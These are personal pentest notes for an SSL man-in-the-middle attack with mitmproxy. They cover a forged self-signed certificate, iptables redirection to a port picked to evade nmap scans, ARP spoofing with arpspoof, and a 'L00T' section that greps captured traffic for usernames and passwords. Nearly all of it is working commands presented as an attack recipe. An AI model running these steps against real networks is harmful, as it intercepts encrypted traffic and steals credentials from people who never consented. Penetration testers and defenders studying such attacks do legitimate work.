SSL MITM WITH MITMPROXY

BINARY INSTALL

apt install mitmproxy
dpkg -l | grep mitm

e.g.

2.0.2-3

FROM SCRATCH

apt install python3 python3-venv
#python3-pip

git clone https://github.com/mitmproxy/mitmproxy.git
cd mitmproxy/

./dev.sh
. venv/bin/activate
mitmproxy --version

e.g.

Mitmproxy: 3.0.0.dev1223 (commit 1d23d50) 
Python:    3.6.4
OpenSSL:   OpenSSL 1.1.0g  2 Nov 2017
Platform:  Linux-4.16.0-rc2-x86_64-Intel-R-_Core-TM-_i5-7400_CPU_@_3.00GHz-with-slackware-14.2

Mitmproxy: 5.0.0.dev (+237, commit 8353f4a)
Python:    3.6.7
OpenSSL:   OpenSSL 1.1.0j  20 Nov 2018
Platform:  Linux-4.15.0-47-generic-x86_64-with-Ubuntu-18.04-bionic

SELF-SIGNED

ideally you get a true cert but this makes a PoC

domain=FQDN
target=x.x.x.x

#openssl s_client -servername $domain -connect $target:443 </dev/null

cd /root/certs/
openssl req -x509 -newkey rsa:2048 -nodes -keyout ${domain%%\.*}.self.key -out ${domain%%\.*}.self.cer -subj /CN=$domain
cat ${domain%%\.*}.self.cer ${domain%%\.*}.self.key > ${domain%%\.*}.self.pem
chmod 400 ${domain%%\.*}.self.cer ${domain%%\.*}.self.key ${domain%%\.*}.self.pem

GATEWAY

default port for mitmproxy is 8080 being for both http or https. we want a port that is not in nmap’s top 1000 to remain hidden

sysctl -w net.ipv4.ip_forward=1
sysctl net.ipv4.ip_forward

echo 0 > /proc/sys/net/ipv4/conf/$netif/send_redirects
cat /proc/sys/net/ipv4/conf/$netif/send_redirects

echo $netif
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 33231
#-i $netif
iptables -L -n -t nat

while making sure you have the appropriate gateway and resolvers yourself so whenever you proxy something

SSL MITM

start the mitm service either with a TUI (truly eats your memory)

echo $LANG
#export LANG=en_US.UTF-8
mitmproxy -h | less

mitmproxy --set block_global=false --mode transparent --showhost \
    --certs $domain=/root/certs/${domain%%\.*}.concat.pem \
    --set console_mouse=false

or tcpdump style (writes to a file)

mitmdump --version
mitmdump -h | less
mitmdump --options | less

ll /data/dumps/
date=`date +%s`

don’t ask me why we need an absolute path there

export SSLKEYLOGFILE="/data/dumps/$date.sslkeylogfile.txt"

now sniffing ONLY example.com (assuming you got a working and concatenated cert there) and passing through the rest with no tainting

echo $date $SSLKEYLOGFILE
mitmdump -p 33231 --set block_global=false --mode transparent --showhost \
    --ignore-hosts '^(?![0-9\.]+:)(?!([^\.:]+\.)*example\.com:)' \
    --certs example.com=/root/certs/example.concat.pem \
    -w /data/dumps/$date.mitmdump --flow-detail 0
#  --ssl-insecure, -k    Do not verify upstream server SSL/TLS certificates.

ARP SPOOF

echo $netif $target $peer
arpspoof -i $netif -t $target -r $peer

L00T

netstat -lntup
cd /data/dumps/
grep -a UserName $date.mitmdump
grep -a Password $date.mitmdump

FINE TUNE

enhance your filter offline

cd /data/dumps/
mitmdump -nr $date.mitmdump "~m get"
mitmdump -nr $date.mitmdump "~m post"

RESOURCES

mitmproxy

Wireshark and SSL/TLS Master Secrets https://docs.mitmproxy.org/stable/howto-wireshark-tls/

Transparent Proxy https://docs.mitmproxy.org/stable/concepts-modes/#transparent-proxy

Transparent Proxying https://mitmproxy.readthedocs.io/en/v2.0.2/transparent.html

Mitmproxy Core Features https://docs.mitmproxy.org/stable/overview-features/

How To: Use mitmproxy to read and modify HTTPS traffic https://blog.heckel.xyz/2013/07/01/how-to-use-mitmproxy-to-read-and-modify-https-traffic-of-your-phone/

ignore domains

Ignoring Domains https://docs.mitmproxy.org/master/howto-ignoredomains/

Ignore Domains https://mitmproxy.readthedocs.io/en/v2.0.2/features/passthrough.html

Ignor regex exclude not working #3013 https://github.com/mitmproxy/mitmproxy/issues/3013

fine tune

mitmdump https://mitmproxy.readthedocs.io/en/v2.0.2/mitmdump.html

Filter expressions https://mitmproxy.readthedocs.io/en/v2.0.2/features/filters.html

nmap

Top 1,000 TCP and UDP ports (nmap default) https://nullsec.us/top-1-000-tcp-and-udp-ports-nmap-default/

Port Selection Data and Strategies https://nmap.org/book/performance-port-selection.html

SecLists/Discovery/Infrastructure/nmap-top1000-ports.txt https://github.com/danielmiessler/SecLists/blob/master/Discovery/Infrastructure/nmap-top1000-ports.txt


Nethence | Pub | Lab | Pbraun | SNE Russia | xhtml